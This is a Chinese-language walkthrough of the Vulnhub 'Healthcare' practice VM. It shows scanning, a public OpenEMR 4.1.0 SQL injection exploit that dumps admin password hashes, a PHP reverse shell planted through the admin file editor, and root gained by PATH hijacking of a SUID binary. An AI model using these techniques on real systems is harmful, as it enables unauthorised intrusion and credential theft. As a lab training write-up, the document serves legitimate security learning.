Vulnhub之Healthcare靶机详细测试过程

这篇具有很好参考价值的文章主要介绍了Vulnhub之Healthcare靶机详细测试过程。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Healthcare

作者: jason huawen

靶机信息

名称:

地址:

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:69:f3:d5      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.254  08:00:27:f6:d1:32      1      60  PCS Systemtechnik GmbH            

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-21 22:01 EDT
Nmap scan report for inplainsight (192.168.56.254)
Host is up (0.000090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3d
80/tcp open  http    Apache httpd 2.2.17 ((PCLinuxOS 2011/PREFORK-1pclos2011))
| http-robots.txt: 8 disallowed entries 
| /manual/ /manual-2.2/ /addon-modules/ /doc/ /images/ 
|_/all_our_e-mail_addresses /admin/ /
|_http-title: Coming Soon 2
|_http-server-header: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
MAC Address: 08:00:27:F6:D1:32 (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.74 seconds

NMAP扫描结果表明目标主机有2个开放端口:21(ftp)、80(http)

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 ProFTPD 1.3.3d Server (ProFTPD Default Installation) [192.168.56.254]
Name (192.168.56.254:kali): anonymous
331 Password required for anonymous
Password: 
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ searchsploit ProFTPD                                       
-----------------------------------------------------------------
  1. FTP不允许匿名访问

  2. FTP服务为ProFTPD,可能存在mod_copy漏洞

┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ curl http://192.168.56.254/robots.txt
# $Id: robots.txt 410967 2009-08-06 19:44:54Z oden $
# $HeadURL: svn+ssh://svn.mandriva.com/svn/packages/cooker/apache-conf/current/SOURCES/robots.txt $
# exclude help system from robots
User-agent: *
Disallow: /manual/
Disallow: /manual-2.2/
Disallow: /addon-modules/
Disallow: /doc/
Disallow: /images/
# the next line is a spam bot trap, for grepping the logs. you should _really_ change this to something else...
Disallow: /all_our_e-mail_addresses
# same idea here...
Disallow: /admin/
# but allow htdig to index our doc-tree
#User-agent: htdig
#Disallow:
# disallow stress test
user-agent: stress-agent
Disallow: /

robots.txt存在/admin/条目,但是访问该目录,却返回页面不存在的错误。

──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ nikto -h http://192.168.56.254       
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.254
+ Target Hostname:    192.168.56.254
+ Target Port:        80
+ Start Time:         2023-04-21 22:08:13 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
+ Server may leak inodes via ETags, header found with file /, inode: 264154, size: 5031, mtime: Sat Jan  6 01:21:38 2018
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ "robots.txt" contains 8 entries which should be manually viewed.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3092: /cgi-bin/test.cgi: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 9543 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2023-04-21 22:09:10 (GMT-4) (57 seconds)
---------------------------------------------------------------------------

nikto扫描结果认为存在shellcode漏洞,查询得到漏洞利用代码:

https://www.exploit-db.com/exploits/34900

但是该代码并不能正常工作,只能另外寻找突破口。

接下来扫描一下目录:

┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x .php,.js,.html,.txt,.sh 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.254
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              js,html,txt,sh,php
[+] Timeout:                 10s
===============================================================
2023/04/21 22:56:51 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 344] [--> http://192.168.56.254/images/]
/index.html           (Status: 200) [Size: 5031]
/index                (Status: 200) [Size: 5031]
/.html                (Status: 403) [Size: 1000]
/css                  (Status: 301) [Size: 341] [--> http://192.168.56.254/css/]
/js                   (Status: 301) [Size: 340] [--> http://192.168.56.254/js/]
/vendor               (Status: 301) [Size: 344] [--> http://192.168.56.254/vendor/]
/favicon              (Status: 200) [Size: 1406]
/robots               (Status: 200) [Size: 620]
/robots.txt           (Status: 200) [Size: 620]
/fonts                (Status: 301) [Size: 343] [--> http://192.168.56.254/fonts/]
/gitweb               (Status: 301) [Size: 344] [--> http://192.168.56.254/gitweb/]
/.html                (Status: 403) [Size: 1000]
/phpMyAdmin           (Status: 403) [Size: 59]
/server-status        (Status: 403) [Size: 1000]
/server-info          (Status: 403) [Size: 1000]
/openemr              (Status: 301) [Size: 345] [--> http://192.168.56.254/openemr/]

扫描出/openemr目录,其他目录没有什么价值。

访问该目录,可知CMS为OpenEMR, 版本为4.1.0,查询是否存在相关漏洞

┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ searchsploit openEMR 4.1.0
-------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                              |  Path
-------------------------------------------------------------------------------------------- ---------------------------------
OpenEMR 4.1.0 - 'u' SQL Injection                                                           | php/webapps/49742.py
Openemr-4.1.0 - SQL Injection                                                               | php/webapps/17998.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ searchsploit -m php/webapps/49742.py 
  Exploit: OpenEMR 4.1.0 - 'u' SQL Injection
      URL: https://www.exploit-db.com/exploits/49742
     Path: /usr/share/exploitdb/exploits/php/webapps/49742.py
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Vulnhub/Healthcare/49742.py

将漏洞利用代码拷贝至工作目录,执行该代码

┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ python 49742.py                                                                      

   ____                   ________  _______     __ __   ___ ____
  / __ \____  ___  ____  / ____/  |/  / __ \   / // /  <  // __ \
 / / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ /  / // /_  / // / / /
/ /_/ / /_/ /  __/ / / / /___/ /  / / _, _/  /__  __/ / // /_/ /
\____/ .___/\___/_/ /_/_____/_/  /_/_/ |_|     /_/ (_)_(_)____/
    /_/
    ____  ___           __   _____ ____    __    _
   / __ )/ (_)___  ____/ /  / ___// __ \  / /   (_)
  / /_/ / / / __ \/ __  /   \__ \/ / / / / /   / /
 / /_/ / / / / / / /_/ /   ___/ / /_/ / / /___/ /
/_____/_/_/_/ /_/\__,_/   /____/\___\_\/_____/_/   exploit by @ikuamike

[+] Finding number of users...
[+] Found number of users: 2
[+] Extracting username and password hash...
admin:3863efef9ee2bfbc51ecdca359c6302bed1389e8
medical:ab24aed5a7c4ad45615cd7e0da816eea39e4895d   

利用在线网站解密:

https://md5decrypt.net/en/Sha1/#answer

得到admin的密码为ackbar, 另外一个用户密码为medical

登录:

http://192.168.56.254/openemr/

在administration栏目中,可以Edit file,看是否可以将shell.php代码增加到其中一个文件,比如:statement.inc.php,而且可以看到完整的路径,将shell.php代码拷贝增加到statement.inc.php后,访问该文件:

http://192.168.56.254/openemr/sites/default/statement.inc.php

从而在Kali Linux上得到reverse shell

┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
└─$ sudo nc -nlvp 5555                  
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 37539
Linux localhost.localdomain 2.6.38.8-pclos3.bfs #1 SMP PREEMPT Fri Jul 8 18:01:30 CDT 2011 i686 i686 i386 GNU/Linux
 20:50:43 up  1:55,  0 users,  load average: 1.00, 1.28, 3.57
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
uid=479(apache) gid=416(apache) groups=416(apache)
sh: no job control in this shell
sh-4.1$ which python
which python
/usr/bin/python
sh-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ cd /home
cd /home
bash-4.1$ ls -alh
ls -alh
total 20K
drwxr-xr-x  5 root     root     4.0K Jul 29  2020 .
drwxr-xr-x 21 root     root     4.0K Apr 21 18:54 ..
drwxr-xr-x 27 almirant almirant 4.0K Jul 29  2020 almirant
drwxr-xr-x 31 medical  medical  4.0K Nov  5  2011 medical
drwxr-xr-x  3 root     root     4.0K Nov  4  2011 mysql

bash-4.1$ cat user.txt
cat user.txt
d41d8cd98f00b204e9800998ecf8427e

从而得到了user flag

提权

看能否用前面得到的密码切换shell到medical

bash-4.1$ su - medical
su - medical
Password: medical

[medical@localhost ~]$ id
id
uid=500(medical) gid=500(medical) groups=500(medical),7(lp),19(floppy),22(cdrom),80(cdwriter),81(audio),82(video),83(dialout),100(users),490(polkituser),501(fuse)

我们的猜测是正确的

[medical@localhost backups]$ find / -perm -4000 -type f 2>/dev/null

/usr/bin/healthcheck有SUID位

[medical@localhost backups]$ strings /usr/bin/healthcheck
strings /usr/bin/healthcheck
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
setuid
system
setgid
__libc_start_main
GLIBC_2.0
PTRhp
[^_]
clear ; echo 'System Health Check' ; echo '' ; echo 'Scanning System' ; sleep 2 ; ifconfig ; fdisk -l ; du -h

可以看到healthcheck会执行ifconfig,因此可以生成我们的ifconfig命令,从而实现提权

cd /tmp
[medical@localhost tmp]$ echo '/bin/bash' > ifconfig
echo '/bin/bash' > ifconfig
[medical@localhost tmp]$ chmod 777 ifconfig
chmod 777 ifconfig
[medical@localhost tmp]$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
[medical@localhost tmp]$ /usr/bin/healthcheck
/usr/bin/healthcheck
TERM environment variable not set.
System Health Check

Scanning System
[root@localhost tmp]# cd /root
cd /root
[root@localhost root]# ls -alh
ls -alh
total 920K
drwxr-x--- 20 root root 4.0K Jul 29  2020 ./
drwxr-xr-x 21 root root 4.0K Apr 21 18:54 ../
-rw-------  1 root root  426 Jul 29  2020 .bash_history
-rw-r--r--  1 root root  193 Sep 24  2011 .bash_profile
-rw-rw-rw-  1 root root  422 Sep  6  2011 .bashrc
drwxr-xr-x  2 root root 4.0K Sep 12  2011 .cache/
drwx------  6 root root 4.0K Sep 12  2011 .config/
drwx------  3 root root 4.0K Jul 19  2011 .dbus/
drwxr--r--  2 root root 4.0K Jul 19  2011 Desktop/
-rw-------  1 root root   28 Jul 22  2011 .dmrc
drwx------  3 root root 4.0K Sep  8  2011 Documents/
drwx------  2 root root 4.0K Sep  6  2011 drakx/
drwx------  4 root root 4.0K Sep 24  2011 .gconf/
drwx------  2 root root 4.0K Sep 24  2011 .gconfd/
drwx------  3 root root 4.0K Sep 12  2011 .gnome2/
drwx------  2 root root 4.0K Sep 12  2011 .gnome2_private/
drwx------  3 root root 4.0K Jul 29  2020 .gnupg/
drwx------  2 root root 4.0K Jul 19  2011 .gvfs/
-rwxr-xr-x  1 root root 5.7K Jul 29  2020 healthcheck*
-rw-r--r--  1 root root  182 Jul 29  2020 healthcheck.c
-rw-------  1 root root    0 Sep 11  2011 .ICEauthority
drwx------  3 root root 4.0K Sep  6  2011 .local/
drwx------  3 root root 4.0K Nov  5  2011 .mc/
-rw-r--r--  1 root root    0 Oct 22  2010 .mdk-menu-migrated
-rw-r--r--  1 root root    0 Jul 21  2011 .menu-updates.stamp
-rw-------  1 root root    6 Jul 29  2020 .mysql_history
-rw-rw-rw-  1 root root 2.1K Jul 29  2020 root.txt
-rw-r--r--  1 root root 797K Apr 12  2020 sudo.rpm
drwx------  2 root root 4.0K Nov  5  2011 .synaptic/
drwx------  2 root root 4.0K Sep 11  2011 .thumbnails/
drwx------  2 root root 4.0K Apr 21 18:54 tmp/
drwxr-xr-x  2 root root 4.0K Jul 29  2020 .xauth/
-rw-r--r--  1 root root 1.9K Jul  6  2011 .xbindkeysrc
[root@localhost root]# cat root.txt
cat root.txt
██    ██  ██████  ██    ██     ████████ ██████  ██ ███████ ██████      ██   ██  █████  ██████  ██████  ███████ ██████  ██ 
 ██  ██  ██    ██ ██    ██        ██    ██   ██ ██ ██      ██   ██     ██   ██ ██   ██ ██   ██ ██   ██ ██      ██   ██ ██ 
  ████   ██    ██ ██    ██        ██    ██████  ██ █████   ██   ██     ███████ ███████ ██████  ██   ██ █████   ██████  ██ 
   ██    ██    ██ ██    ██        ██    ██   ██ ██ ██      ██   ██     ██   ██ ██   ██ ██   ██ ██   ██ ██      ██   ██    
   ██     ██████   ██████         ██    ██   ██ ██ ███████ ██████      ██   ██ ██   ██ ██   ██ ██████  ███████ ██   ██ ██ 
                                                                                                                          
                                                                                                                          
Thanks for Playing!

Follow me at: http://v1n1v131r4.com


root hash: eaff25eaa9ffc8b62e3dfebf70e83a7b
 
[root@localhost root]# 

至此成功得到了root shell和root flag.文章来源地址https://www.toymoban.com/news/detail-421349.html

经验教训

  1. 在nikto结果得知目标可能存在shellshock后,就认定可以利用漏洞,而忽略对于web应用的正常步骤,即扫描目录,而且需要足够的耐心才能得到相应的目录,否则该靶机将无解。

到了这里,关于Vulnhub之Healthcare靶机详细测试过程的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Vulnhub之Funbox 1靶机详细测试过程

    作者:jason_huawen 名称:Funbox: 1 地址: 利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.164 NMAP扫描结果表明目标主机有4个开放端口:21(FTP)、22(SSH)、80(HTTP)、33060(Mysqlx?) 目标主机不允许匿名访问; FTP服务软件维ProFTDd,但版本未知 Kali Linux上浏览器访问

    2024年02月03日
    浏览(36)
  • Vulnhub之HF 2019靶机详细测试过程

    作者:jason huawen 名称:Hacker Fest: 2019 地址: 将虚拟机镜像导入到VirtualBox中,并设置网络模式为host-only,然后启动Kali Linux以及目标主机(虚拟机): 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 从NMAP扫描结果表明目标主机有4个开放端口:21(ftp)、22(ssh)、8

    2023年04月22日
    浏览(43)
  • Vulnhub之Grotesque3靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.156 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http) 浏览器访问80端口,返回页面图片中有提示md5? 可能指的是目录字典需要md5加密? 然后去掉每行结果的\\\'-\\\' 然后删除空格: 利用gobuster工具发现了文件 但是

    2023年04月27日
    浏览(36)
  • Vulnhub之Gain Power靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.254 NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、8000(http) nikto工具扫描出目录/secret,访问该目录,将该目录下的图片文件下载到Kali Linux本地进行分析。 但是图片分析没有得到任何有意的结果。 假设用户

    2024年02月02日
    浏览(51)
  • Vulnhub之Inplainsight靶机详细测试过程及经验教训

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 NMAP扫描结果表明目标主机有3个开放端口:21(ftp)、22(ssh)、80(http) 用户:mike, joe 可能有backdoor文件 目标站点是wordpress? Gobuster工具识别出目录/wordpress,访问该目录,发现页面显示不完整,查看页面源代码,可知需

    2023年04月16日
    浏览(43)
  • Vulnhub之KB Vuln 3靶机详细测试过程

    作者:jason huawen 利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.254 NMAP扫描结果表明目标主机有4个开放端口:22(ssh)、80(http)、139/445(samba) 通过smbclient工具连接目标主机的smb服务,将共享目录中的文件下载到Kali Linux。 enum4linux工具识别出目标主机存在用户名heisenbe

    2023年04月12日
    浏览(43)
  • Vulnhub之Harrison靶机详细测试过程(提权成功)

    作者:jason huawen 名称: SP: harrison 地址: 利用Kali LInux的netdiscover工具识别目标主机的IP地址为192.168.56.125 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、445(samba) enum4linux识别出用户名harrison 没那么容易? 虽然得到了shell,但是这是受限的shell 用-t选项指定不同的shell没能逃脱

    2023年04月23日
    浏览(38)
  • Vulnhub之Hacker Fest 2019靶机详细测试过程

    作者:jason huawen 名称:Hacker Fest: 2019 地址: 将虚拟机镜像导入到VirtualBox中,并设置网络模式为host-only,然后启动Kali Linux以及目标主机(虚拟机): 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 从NMAP扫描结果表明目标主机有4个开放端口:21(ftp)、22(ssh)、8

    2023年04月22日
    浏览(40)
  • Vulnhub之KB Vuln Final靶机详细测试过程

    作者: jason huawen 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.184 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http),并且nmap扫描结果可知目标主机站点有.git/目录。 Gosuter工具发现了/sites目录 浏览器访问80端口,访问/sites目录,并逐级进入下一层目录,

    2023年04月12日
    浏览(35)
  • Vulnhub之Gears of War靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 smb服务不允许上传文件 将共享目录的文件下载到Kali Linux到本地 利用enum4linux工具识别目标主机存在marcus用户 john没有破解出来。 SOS.txt文件中的[@%%,],是密码的表达式吗?可用crunch产生字典 这样就根据作者提示的

    2024年02月02日
    浏览(36)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包